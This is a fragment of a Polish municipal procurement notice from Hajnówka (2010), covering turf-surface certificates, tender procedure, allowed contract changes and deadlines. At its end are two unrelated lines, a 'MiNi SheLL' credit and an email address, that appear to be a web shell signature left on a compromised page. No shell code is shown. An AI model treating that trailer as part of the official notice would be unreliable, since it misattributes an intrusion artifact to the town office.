           b. aktualny  certyfikat  lub  deklaracja  zgodności  z  normą  PN-EN 15330-1:2008, lub
 aprobata  techniczna  ITB, lub 
 rekomendacja  techniczna  ITB,
           c. karta  techniczna  oferowanej  nawierzchni, potwierdzona  przez  jej  producenta,
           d. atest  PZH  lub  równoważny  dla  oferowanej  nawierzchni  i  wypełnienia,
           e. autoryzacja  producenta  trawy  syntetycznej, wystawiona dla wykonawcy na realizowaną
                inwestycję  wraz  z  potwierdzeniem  gwarancji  udzielonej  przez  producenta  na  tą  
                nawierzchnię,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W  trakcie  realizacji  umowy  postanowienia  umowy  mogą  ulec  zmianom, jeżeli  zmiany   
     będą  korzystne  dla  Zamawiającego  lub  konieczność  wprowadzenia  zmian  wynikać  będzie   
     z  okoliczności, których  nie  można  było  przewidzieć  w  chwili  zawarcia  umowy.
2. Zamawiający  przewiduje  możliwość  zmiany  postanowień  zawartej  umowy  w  przypadku:
     a. zmiany  regulacji  prawnych  obowiązujących  w  chwili  zawarcia  umowy,
     b. zmiany  danych  dotyczących  Zamawiającego  lub  Wykonawcy,
     c. zmiany  Podwykonawcy  robót,
     d. zmiany  przez  Wykonawcę  formy  wniesienia  zabezpieczenia  należytego  wykonania  
         umowy,
     e. zmiany  osób  kierujących  robotami  budowlanymi,
     f. zmiany  terminu  i  zakresu  wykonania  zamówienia, które  zaistniały  w  trakcie  realizacji  
         przedmiotu  umowy  z  przyczyn  niezależnych  od  Zamawiającego  i  od  Wykonawcy  tj.:  
        - wystąpienia  niekorzystnych  warunków  atmosferycznych, geologicznych, hydrologicznych,            
        - wystąpienia  odkryć  archeologicznych, 
        - natrafienia  na  niewybuchy  i  niewypały, 
        - wystąpienia  klęsk  żywiołowych (powódź, pożar itp.),  
3. Warunki  ewentualnych  zmian  -  stosownie  do  czasu  trwania  okoliczności  będących  
     podstawą zmiany.
4. Zmiana  postanowień  zawartej  umowy  w  przypadkach  określonych  w  pkt. 2  nie  może  
    prowadzić  do  zwiększenia  wynagrodzenia  Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hajnowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1
tel. 85  682 2875, 682 2702
fax. 85  682 2994.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2010 godzina 10:00, miejsce: Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
                                                 pok. Nr  219  -  sekretariat  Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com